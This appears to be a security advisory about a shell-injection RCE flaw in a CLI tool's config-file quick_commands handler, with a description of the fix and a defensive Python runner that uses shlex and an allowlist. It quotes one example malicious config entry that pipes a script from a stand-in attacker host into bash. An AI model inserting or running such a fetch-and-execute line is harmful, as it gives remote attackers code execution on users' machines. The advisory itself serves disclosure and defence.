## CLI Tool Patches Critical RCE Flaw: Config File Import Could Trigger Arbitrary Code Execution
A high-severity remote code execution vulnerability has been identified and remediated in a command-line interface tool's quick commands handler. The flaw, rated CVSS 7.8, stemmed from the direct use of `subprocess.run()` with `shell=True` on commands parsed from user-supplied configuration files, creating a direct path for arbitrary shell execution if a malicious or compromised config were loaded.

The vulnerability resided in how the CLI processed YAML and TOML configuration files containing `quick_commands` definitions. When a user loaded a config file—potentially shared across teams, downloaded from repositories, or received from third parties—the tool would execute whatever shell command string was embedded in the configuration without sanitization. An attacker could craft a config file with an entry such as `quick_commands: [{command: "curl attacker.com/shell|bash"}]` and achieve full RCE with the privileges of the CLI process.

The fix introduces a dedicated `tools/quick_command_runner.py` module that fundamentally restructures command execution. The updated handler now parses command strings using `shlex.split()` to produce safe argument lists, executes subprocesses with `shell=False` to prevent shell injection, and validates binary paths against an allowlist of permitted executables. The module returns structured results containing stdout, stderr, and return codes for consistent error handling. The CLI's `quick_commands` handler has been updated to import and invoke this module rather than calling `subprocess` directly.
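A runner of the kind the fix describes (tokenise with `shlex.split()`, run with `shell=False`, check the binary against an allowlist, return a structured result), written here as an added example and not the project's own `tools/quick_command_runner.py`; the allowlist contents, the `QuickCommandResult` type and the config shape are assumptions:

```python
import os
import shlex
import shutil
import subprocess
from dataclasses import dataclass
from typing import List, Optional

# Executables a quick command may invoke; anything else is rejected before a
# subprocess is created. Illustrative allowlist, not the project's own.
ALLOWED_BINARIES = frozenset({"echo", "ls", "git"})


@dataclass
class QuickCommandResult:
    ok: bool
    stdout: str = ""
    stderr: str = ""
    returncode: Optional[int] = None
    error: str = ""


def run_quick_command(command: str, timeout: float = 10.0) -> QuickCommandResult:
    """Run one quick_commands entry without a shell; replaces the vulnerable
    subprocess.run(command, shell=True), which fed the raw string to /bin/sh."""
    try:
        argv = shlex.split(command)  # shell-like tokenising, but no shell runs
    except ValueError as exc:        # e.g. an unbalanced quote
        return QuickCommandResult(ok=False, error=f"unparseable command: {exc}")
    if not argv:
        return QuickCommandResult(ok=False, error="empty command")
    binary = argv[0]
    # A path-qualified binary ("./x", "/tmp/x") would bypass the allowlist,
    # so only bare names that resolve via PATH are accepted.
    if os.sep in binary or binary not in ALLOWED_BINARIES:
        return QuickCommandResult(ok=False, error=f"binary not allowed: {binary!r}")
    resolved = shutil.which(binary)
    if resolved is None:
        return QuickCommandResult(ok=False, error=f"binary not found: {binary!r}")
    # shell=False: '|', ';', '$(...)' are plain argument characters here.
    proc = subprocess.run([resolved, *argv[1:]], shell=False,
                          capture_output=True, text=True, timeout=timeout)
    return QuickCommandResult(ok=True, stdout=proc.stdout,
                              stderr=proc.stderr, returncode=proc.returncode)


def run_config(config: dict) -> List[QuickCommandResult]:
    """Run every quick_commands entry of an already-parsed YAML/TOML config."""
    return [run_quick_command(entry["command"])
            for entry in config.get("quick_commands", [])]
```

With `shell=False`, an entry such as `echo hi | sh` makes `echo` print the literal text `hi | sh` rather than piping anything into a shell, and an entry whose first token is not on the allowlist is refused before any process starts.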

The exposure raises concerns around supply-chain trust in configuration files, particularly in development environments where `.dashrc` or `cli-config.yaml` files are commonly shared. Organizations using this CLI should verify they are running the patched version and exercise caution when loading configs from untrusted sources.
---
- **Source**: GitHub Issues
- **Sector**: The Lab
- **Tags**: RCE, CVSS 7.8, shell injection, subprocess, supply-chain
- **Credibility**: unverified
- **Published**: 2026-05-03 13:54:07
- **ID**: 79116
- **URL**: https://whisperx.ai/en/intel/79116